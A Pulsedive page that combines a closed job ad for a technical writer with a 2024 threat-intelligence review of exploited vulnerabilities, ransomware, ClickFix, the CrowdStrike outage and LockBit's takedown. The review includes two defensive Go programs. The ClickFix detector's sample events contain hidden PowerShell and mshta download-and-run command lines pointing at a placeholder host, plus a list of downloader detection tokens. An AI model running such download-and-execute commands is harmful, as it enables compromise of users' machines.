Update: This role is now closed and no longer accepting applications.
⭐ Pulsedive | Part-Time / Contract | Fully Remote, Global | HQ in USA
The Opportunity
Create clear, concise, and user-friendly documentation that empowers our community to effectively utilize Pulsedive's platform.
Pulsedive is a threat intelligence startup that delivers frictionless threat intelligence solutions for growing teams. We bring together intelligence in our platform and data products (Pro, API, Feed, Enterprise TIP), correlating indicators of compromise and organizing information to support threat collection, pivoting, research, and analysis.
Pulsedive is looking for a skilled technical writer on a contracting basis to document use cases, technical specifications, and guides for our platforms, products, and integrations. If you’re energized by making complex technical information accessible and engaging for technical audiences, this is the role for you. You will work closely with product and engineering to research, write, and maintain high-quality documentation that helps our users and clients leverage Pulsedive's solutions to their fullest potential.
Working at Pulsedive
Regardless of your role or expertise, we seek candidates who embrace honesty, enjoy constant learning, and are empowered by ownership of their work. As a product-led company, our users are our primary stakeholders. We believe there are countless ways for talented individuals from all backgrounds to contribute their unique skills, interests, and perspectives as Pulsedive grows—and we can't wait to work with and learn from you.
You’ll Get To
Document technical features, integrations, architectures, and APIs
Create clear and accessible guides, walkthroughs, and help articles for a range of technical audiences and use cases
Migrate and improve existing content, creating a streamlined and centralized system for all technical documentation
Collaborate with Pulsedive leadership and subject matter experts
Get hands-on learning by using Pulsedive tools and sandboxed environments
Help maintain up-to-date information to reflect new features, integrations, and product changes
Create maintenance plans and style guides, laying the groundwork for future documenters
Communicate information with diagrams, charts, illustrations, animations, and more to effectively convey concepts and architectures
Act on feedback to improve Pulsedive’s documentation and user support content
Manage your time and workflow independently in a fully remote environment
What You’ve Got (and We Want)
3+ years experience in technical writing, documentation, or related fields
2+ years in IT, computer science, networking, and/or cybersecurity
Proficiency in English with the ability to communicate technical concepts in a clear, concise, and user-friendly manner
Proven experience creating documentation for cloud-based SaaS products
Ability to research and write documentation for new features and integrations, while closing gaps in existing content
Ability to interview subject matter experts to extract and clarify complex technical information with minimal review
Bonus Points For
Familiarity researching and deploying tools or platforms for technical documentation
Practical experience with customer success and enablement
Extensive experience with cybersecurity platforms, particularly in threat intelligence
This is a part-time, fully remote contract role with potential for a full-time role at Pulsedive. Our working schedule is flexible, with an average 10-hour weekly commitment. You will have high levels of autonomy, working asynchronously with the Pulsedive team. We’ll develop expectations, milestones, and timelines for deliverables together - but give you the space to work in the ways you find the most productive and fulfilling.
Not for you, but you know someone who knows someone? Help us get the word out by sharing this post!
What Happens Next?
After we receive your application, we'll update you on your status. If we think there's a fit, we'll send you a quick email to verify relevant experience and then set up a time to interview.
This blog aims to highlight some of the major incidents and events in cyberspace in 2024. Looking back, it feels like 2024 flew by with a steady stream of issues constantly grabbing the attention of defenders (and the media). Apart from the continued targeting of public-facing sources such as firewalls and other networking appliances, this year will be remembered for law enforcement takedowns and the CrowdStrike outage.
Read on for a review of:
Our predictions for 2024 from last year
Key exploited vulnerabilities
Top malware
Outages
Law enforcement actions
Looking ahead to 2025
Pulsedive rewind
Recap
Looking back at our predictions for the year
Vulnerability and Exploitation Predictions
In 2023, we predicted that exploitation attempts against public-facing infrastructure, and the speed at which newly disclosed vulnerabilities in these appliances are exploited, would continue to increase in 2024. Unfortunately, this prediction appeared to come true: throughout the year, several vulnerabilities in public-facing applications were exploited for initial access into environments. The Key Exploited Vulnerabilities section below discusses some notable examples.
Ransomware Predictions
We expected ransomware to remain one of the more prominent threats organizations faced in 2024. This held true, as ransomware attacks continued to grab headlines while threat actors targeted organizations worldwide. We also observed several groups deploying ransomware at healthcare organizations. Defenders and law enforcement had some success against ransomware, with takedowns against LockBit.
Key Exploited Vulnerabilities
💡 This section is not intended to serve as an exhaustive list of vulnerabilities exploited in 2024 but rather as a summary of some memorable ones that affected security teams.
Cleo File Transfer Software
On December 3rd, 2024, Huntress released a blog outlining the exploitation of Cleo Harmony, Cleo VLTrader, and Cleo LexiCom, file transfer software that organizations use to share files with other users; the exploitation led to unauthenticated remote code execution. The issue was initially tracked as CVE-2024-50623, but it was quickly discovered that the patches for that vulnerability did not mitigate the risk, and the patches issued for CVE-2024-55956 addressed the problem.
CVE-2024-55956 allowed an unauthenticated threat actor to import and execute bash or PowerShell commands using the Autorun directory. This access was then used to reach external infrastructure and download files used in post-exploitation attempts.
BleepingComputer reported that the Cl0p ransomware group used this vulnerability to exfiltrate data from organizations.
Figure 1: Cl0p confirms that they are responsible for intrusions that exfiltrated data from Cleo instances. Source: BleepingComputer
Exploitation of Public Facing Infrastructure
Threat actors heavily targeted networking software and file transfer appliances throughout 2024. These products are public-facing and may offer a path into corporate environments. Because they are more accessible, they remain high-priority targets, and we observed threat actors rapidly exploiting these vulnerabilities once details became available.
Some of the notable vulnerabilities in public-facing software observed this year included:
CVE-2024-3400 - PAN-OS: Arbitrary File Creation Leads to OS Command Injection Vulnerability in GlobalProtect
CVE-2024-3400 is an arbitrary file creation vulnerability in the GlobalProtect feature of PAN-OS. It can lead to OS command injection and has been used to exfiltrate data from the server or run commands. Palo Alto tracked the exploitation of this vulnerability as Operation MidnightEclipse.
Figure 2: Level of exploitation as categorized by Palo Alto. Source: Palo Alto
CVE-2024-8190 is an OS command injection vulnerability in the Ivanti Cloud Services Application (CSA). For versions 4.6 Patch 518 and before, exploiting this vulnerability could allow an unauthenticated attacker to execute code remotely. CISA has added this vulnerability to its known exploited vulnerability catalog.
CVE-2024-47575 (FortiJump) - Authentication Bypass in FortiClientWindows
CVE-2024-47575, also called FortiJump, is an authentication bypass in Fortinet FortiClientWindows versions 7.4.0, 7.2.4 through 7.2.0, 7.0.12 through 7.0.0, and 6.4.10 through 6.4.0. This vulnerability allowed a threat actor-controlled FortiManager device to execute code against vulnerable FortiManager devices. Mandiant observed exploitation of the vulnerability as early as June 27, 2024.
Figure 3: An adversary-controlled FortiManager being added to a victim's FortiGate devices. Source: Google
One of the year's biggest stories, CVE-2024-3094, is a vulnerability that affected the xz compression libraries in Linux distributions. The affected versions (5.6.0 and 5.6.1) of the xz libraries contained malicious code that allowed unauthorized access.
xz is a data compression format used within Linux distributions; the xz utilities compress and decompress large files into smaller sizes. The multi-stage backdoor extracts a shared object, liblzma_la-crc64.fast.o, which is added to the compilation of liblzma. The shared object replaced a function name, and when any process loads liblzma, the malicious code interferes with the function resolution process. OpenSSH’s RSA_public_decrypt function uses liblzma, and the malicious code could extract a command from the authenticating client’s certificate and use it for remote code execution.
Figure 5: How the compromised liblzma library could be used by sshd. Source: Akamai
Malware
This year, information stealers, like Agniane and Mystic Stealer, and other malware-as-a-service continued to be used against users and organizations. Information stealers served as the initial stages of intrusions, either collecting credentials or deploying other malware. Ransomware continued to be a major threat to organizations, with several groups targeting healthcare organizations and other critical industries.
Ransomware Targeting Healthcare
ALPHV targeted Change Healthcare, a revenue and payment management provider, in February 2024. More than 100 million individuals had their data stolen in the attack, which also impacted the operations of healthcare organizations that relied on Change Healthcare. Change Healthcare appeared to pay a ransom of $22 million before ALPHV performed an exit scam, including deploying a fake law enforcement seizure banner on its data leak site.
In June 2024, Qilin hit Synnovis, a lab services provider for the NHS, with ransomware that disrupted its IT systems and the operation of several NHS Trust locations. The group was able to exfiltrate sensitive patient information, including names, dates of birth, NHS numbers, and test descriptions.
In May 2024, Ascension Health suffered a ransomware attack by Black Basta. The attack impacted hospital operations by taking Ascension’s MyChart, an electronic health record system, offline. While the service was down, healthcare professionals had to resort to manual documentation. Following an investigation, Ascension identified that 5.9 million individuals had their data stolen. The data exfiltrated during the attack included patient and employee names, as well as medical and payment information.
In addition to continuing ransomware attacks and identifying new malware types, malware authors continued experimenting with different methods of deploying their malware onto devices. One method that grew in popularity this year is ClickFix.
ClickFix
This social engineering tactic manipulates users into executing code on their own devices. The user is presented with a document or web page carrying a banner with instructions to follow, similar to Figures 6 - 8.
The banner will instruct the user to:
Launch the run dialog
Paste in content that is in their clipboard (an older version of ClickFix required the user to copy the malicious code, while newer versions automatically add it to the user’s clipboard)
Run the command
Figure 6: A ClickFix lure within a Word document. Source: McAfee
Figure 7: A ClickFix lure displayed on a web page. Source: McAfee
Figure 8: ClickFix lure that doesn't require users to copy commands. Source: Sekoia
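From the detection side, the ClickFix chain above leaves a recognizable trace in process telemetry: an interpreter launched directly from the desktop shell (the Run dialog is a child of explorer.exe) with a command line that fetches or decodes further content. The Go program below is an added example for this post, not Pulsedive or vendor code; it reads constructed newline-delimited JSON process-creation events (the field names `parent_image`, `image`, `command_line` are an assumed schema, and `placeholder.invalid` is a reserved, non-routable name) and flags events that match the heuristic.

```go
package main

import (
	"encoding/json"
	"fmt"
	"path/filepath"
	"strings"
)

// ProcEvent is a minimal process-creation record; the field names are a
// constructed schema, not any particular EDR or Sysmon export format.
type ProcEvent struct {
	ID          int    `json:"id"`
	ParentImage string `json:"parent_image"`
	Image       string `json:"image"`
	CommandLine string `json:"command_line"`
}

// Interpreters that a pasted Run-dialog one-liner typically invokes.
var interpreters = map[string]bool{
	"powershell.exe": true, "pwsh.exe": true, "mshta.exe": true,
	"cmd.exe": true, "wscript.exe": true, "cscript.exe": true,
}

// Substrings common to clipboard-delivered download/decode one-liners.
// Matched case-insensitively; "iex" alone is intentionally loose and will
// need tuning against a real environment's baseline.
var suspiciousTokens = []string{
	"-enc", "-encodedcommand", "-w hidden", "-windowstyle hidden",
	"iex", "invoke-expression", "downloadstring", "invoke-webrequest",
	"mshta http", "curl ", "bitsadmin",
}

// base lowercases the file-name part of a Windows or POSIX path.
func base(p string) string {
	p = strings.ReplaceAll(p, `\`, "/")
	return strings.ToLower(filepath.Base(p))
}

// Alert is the output for one flagged event.
type Alert struct {
	EventID int
	Reasons []string
}

// evaluate applies the heuristic to one event: an interpreter spawned
// directly by explorer.exe whose command line carries downloader or
// encoded-command tokens.
func evaluate(e ProcEvent) (Alert, bool) {
	if base(e.ParentImage) != "explorer.exe" || !interpreters[base(e.Image)] {
		return Alert{}, false
	}
	cl := strings.ToLower(e.CommandLine)
	var reasons []string
	for _, tok := range suspiciousTokens {
		if strings.Contains(cl, tok) {
			reasons = append(reasons, tok)
		}
	}
	if len(reasons) == 0 {
		return Alert{}, false
	}
	return Alert{EventID: e.ID, Reasons: reasons}, true
}

// scan parses newline-delimited JSON events and returns the alerts in order.
func scan(ndjson string) ([]Alert, error) {
	var alerts []Alert
	for _, line := range strings.Split(strings.TrimSpace(ndjson), "\n") {
		var e ProcEvent
		if err := json.Unmarshal([]byte(line), &e); err != nil {
			return nil, fmt.Errorf("event parse: %w", err)
		}
		if a, ok := evaluate(e); ok {
			alerts = append(alerts, a)
		}
	}
	return alerts, nil
}

// sampleEvents is constructed telemetry: a hidden-window PowerShell download
// from the Run dialog (1), mshta fetching remote content (2), an admin's
// benign PowerShell launched from explorer (3), and a scheduled batch job
// whose parent is not the shell (4).
const sampleEvents = `{"id":1,"parent_image":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","command_line":"powershell -w hidden -c \"iex (iwr http://placeholder.invalid/x)\""}
{"id":2,"parent_image":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\mshta.exe","command_line":"mshta http://placeholder.invalid/y.hta"}
{"id":3,"parent_image":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","command_line":"powershell Get-Service"}
{"id":4,"parent_image":"C:\\Windows\\System32\\svchost.exe","image":"C:\\Windows\\System32\\cmd.exe","command_line":"cmd /c C:\\Scripts\\backup.bat -enc"}`

func main() {
	alerts, err := scan(sampleEvents)
	if err != nil {
		panic(err)
	}
	for _, a := range alerts {
		fmt.Printf("event %d: %s\n", a.EventID, strings.Join(a.Reasons, ", "))
	}
}
```

The parent-process condition is what separates this from a generic "suspicious PowerShell" rule: the newer lures that pre-load the clipboard still depend on the user typing the command into the Run dialog, so the interpreter's parent is the shell rather than a document handler or a scheduler.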
CrowdStrike BSOD Outage
On July 19th, CrowdStrike pushed a detection update to its Falcon sensors. The update included a problematic configuration file that caused the Windows operating system to crash, leaving users with the blue screen of death. Computers stuck on the blue screen of death made up the outage, which led to business disruptions as impacted organizations no longer had access to their devices.
Threat actors quickly took advantage of the situation by registering domains for phishing attempts. These phishing scams capitalized on the outage by offering recovery software or processes in exchange for money. The goal was to get users to send money or to deploy malware on their devices.
Figure 9: IOCs related to the CrowdStrike BSOD incident can be found using the explore query threat="Crowdstrike BSOD Impersonation".
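Opportunistic domain registrations like those described above are easiest to catch by triaging newly registered domains against the impersonated brand. The Go program below is an added example for this post (not Pulsedive's Explore or any vendor tooling); it scores a constructed list of domains by brand containment, edit distance of the registered label to the brand, and the presence of incident lure words. The domain list, allowlist, and lure-word list are all constructed assumptions, and the scoring weights are illustrative.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
)

const brand = "crowdstrike"

// Constructed allowlist of legitimate brand domains (assumed, not authoritative).
var allowlist = map[string]bool{"crowdstrike.com": true}

// Words registrants pair with a brand during an incident; constructed list.
var lureWords = []string{"fix", "recovery", "bsod", "update", "claim", "support", "outage"}

func min3(a, b, c int) int {
	m := a
	if b < m {
		m = b
	}
	if c < m {
		m = c
	}
	return m
}

// levenshtein is the standard edit distance (insert, delete, substitute).
func levenshtein(a, b string) int {
	ra, rb := []rune(a), []rune(b)
	prev := make([]int, len(rb)+1)
	cur := make([]int, len(rb)+1)
	for j := range prev {
		prev[j] = j
	}
	for i := 1; i <= len(ra); i++ {
		cur[0] = i
		for j := 1; j <= len(rb); j++ {
			cost := 1
			if ra[i-1] == rb[j-1] {
				cost = 0
			}
			cur[j] = min3(prev[j]+1, cur[j-1]+1, prev[j-1]+cost)
		}
		prev, cur = cur, prev
	}
	return prev[len(rb)]
}

// registrableLabel returns the label left of the last dot; a simplification
// that ignores multi-label public suffixes such as co.uk (assumption).
func registrableLabel(domain string) string {
	parts := strings.Split(strings.TrimSuffix(domain, "."), ".")
	if len(parts) < 2 {
		return parts[0]
	}
	return parts[len(parts)-2]
}

// Hit is a domain that scored above zero, with the reasons.
type Hit struct {
	Domain string
	Score  int
	Why    []string
}

// scoreDomain returns a Hit when the domain looks like a brand lookalike.
func scoreDomain(domain string) (Hit, bool) {
	d := strings.ToLower(domain)
	if allowlist[d] {
		return Hit{}, false
	}
	label := registrableLabel(d)
	h := Hit{Domain: d}
	if strings.Contains(label, brand) {
		h.Score += 3
		h.Why = append(h.Why, "contains brand")
	} else {
		// Compare the whole label and each hyphen-separated segment to the brand.
		dist := levenshtein(label, brand)
		for _, seg := range strings.Split(label, "-") {
			if d2 := levenshtein(seg, brand); d2 < dist {
				dist = d2
			}
		}
		if dist <= 2 {
			h.Score += 2
			h.Why = append(h.Why, fmt.Sprintf("edit distance %d from brand", dist))
		}
	}
	if h.Score == 0 {
		return Hit{}, false
	}
	for _, w := range lureWords {
		if strings.Contains(label, w) {
			h.Score++
			h.Why = append(h.Why, "lure word: "+w)
		}
	}
	return h, true
}

// triage scores every domain and orders hits by descending score.
func triage(domains []string) []Hit {
	var hits []Hit
	for _, d := range domains {
		if h, ok := scoreDomain(d); ok {
			hits = append(hits, h)
		}
	}
	sort.SliceStable(hits, func(i, j int) bool { return hits[i].Score > hits[j].Score })
	return hits
}

// sampleNRD is a constructed newly-registered-domain sample.
var sampleNRD = []string{
	"crowdstrike.com",          // allowlisted
	"crowdstrike-bsod-fix.com", // brand plus two lure words
	"crowdstirke-update.net",   // transposition plus lure word
	"crowdstrikeclaim.info",    // brand plus lure word
	"weather-report.org",       // unrelated
	"cloudstrike-recovery.com", // two substitutions plus lure word
}

func main() {
	for _, h := range triage(sampleNRD) {
		fmt.Printf("%-26s score=%d  %s\n", h.Domain, h.Score, strings.Join(h.Why, "; "))
	}
}
```

In practice the input would be a daily NRD feed and the output would seed passive DNS and certificate transparency lookups; the point of scoring rather than exact matching is that registrants vary spelling and lure words faster than a static list can follow.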
Law Enforcement Actions
Figure 10: Banner placed on LockBit site after Operation Cronus. Source: Trend Micro
In February 2024, law enforcement agencies disrupted LockBit operations through Operation Cronus. This multi-agency investigation resulted in the freezing of over 200 cryptocurrency accounts tied to LockBit and the UK’s National Crime Agency (NCA) taking over the group's infrastructure. The investigation also led to the publication of details about the group using the seized infrastructure.
Figure 11: Results of Operation Cronus. Source: Europol
Figure: Law enforcement using LockBit's Data Leak Site to announce the disruption operation. Source: Trend Micro
Authorities also made decryption keys available, which helped victims of LockBit with recovery efforts. The decryption tool is available through NoMoreRansom.
In addition to the takedown efforts in February, the US Department of Justice announced charges against Rostislav Panev, a Russian and Israeli national, who was arrested in Israel on December 20, 2024. The DOJ press release indicated that Panev was responsible for developing the LockBit ransomware and maintaining technical infrastructure. The DOJ has also indicted Dmitry Yuryevich Khoroshev, who is thought to be LockBitSupp, the persona used by LockBit to communicate on forums such as XSS.IS.
While LockBit appeared to recover from Operation Cronus and was able to deploy ransomware at organizations throughout the year, the arrest of its developer may impact future operations. While the takedown of technical infrastructure benefits defenders and such law enforcement action should be applauded, arresting those behind these groups will significantly disrupt operations.
💡 For a recap of 2024’s cyber trends, we recommend reading BushidoToken’s “Top 10 Cyber Threats of 2024” blog.
Looking Ahead to 2025
We expect 2025 to be similar to 2024 regarding the types of threats defenders will have to deal with. Threat actors will continue to target public-facing applications and servers, and prioritizing patching these applications will become increasingly important. However, solely relying on patch management will not be sufficient, and a layered defensive approach is required to mitigate risks. This includes host- and network-based monitoring to identify anomalous processes and the traffic related to these applications.
Remote management and monitoring (RMM) tools were heavily abused in 2024, continuing the trend from prior years. These tools allowed threat actors to access environments and establish persistence while blending in. The use of tools already present within a victim’s environment will continue, requiring defenders to track tool usage and deploy policies through device management solutions to restrict access to authorized applications.
Finally, generative AI (Gen AI) is another avenue we expect threat actors to abuse heavily in 2025. We anticipate threat actors using Gen AI to create more effective social engineering lures and aid in developing malicious tools.
Pulsedive Rewind
As we close out the year, we also wanted to share a few of our highlights. In 2024, we strengthened our infrastructure and capabilities across our products. We were energized by our community of Pulsedive users and clients - some of whom we were lucky to meet at various events throughout the year. Check out what our team was up to, plus some of our favorite moments below.
New and Favorite Integrations
We added integrations with OpenCTI, ServiceNow, and Torq.
Your favorite integrations? Palo Alto Cortex XSOAR, Cisco SecureX, SpiderFoot, Tines, and pfSense pfBlockerNG.
Top Blogs
Our CyberChef tutorial and example walkthrough quickly became our top blog. We hear you: expect more helpful guides on free resources and tools in 2025.
Threat Research: Loaders, Stealers, Ransomware, and More
With an unending cycle of threats, news, and vulnerabilities, it’s hard to stay on top of every development. We focused on providing clear summaries with unique insights to help analysts and researchers stay in the know. Here’s which threats piqued your interest the most:
This year, we presented our research on sharing at the SANS CTI Summit, volunteered in our local community’s SECONNJ and Alice in Cyberspace conferences, pulled back the curtains to share stories about the realities of bootstrapping at BSidesNYC, served on the CFP review panel for Cyberjutsu, donated licenses for live NOC demonstrations with our partner Cisco at BlackHat and RSA, and more. It’s always an amazing time meeting with users and clients from all over the world. Two of our recorded talks include:
In 2024, our team released improvements to our free add-on, introduced MFA to all users, improved our scanning infrastructure, updated our STIX/TAXII docs, and a bunch more in the backend. Up next, you can expect improvements to scanning performance, risk scoring, searchable properties, and downloadable content from scans.
We can’t say it enough: feedback from our community keeps us motivated and committed to making Pulsedive better every year. When we get messages out of the blue like “I just want to send a HUGE thank you and congratulations to all of the team that built and maintains this awesome platform!” and “You folks are great, thanks for being such a wonderful group in the Intel space”, it continues to solidify why we do what we do, and how we do it every day.
We thank you from the bottom of our hearts for your support and for being part of our journey. On to 2025.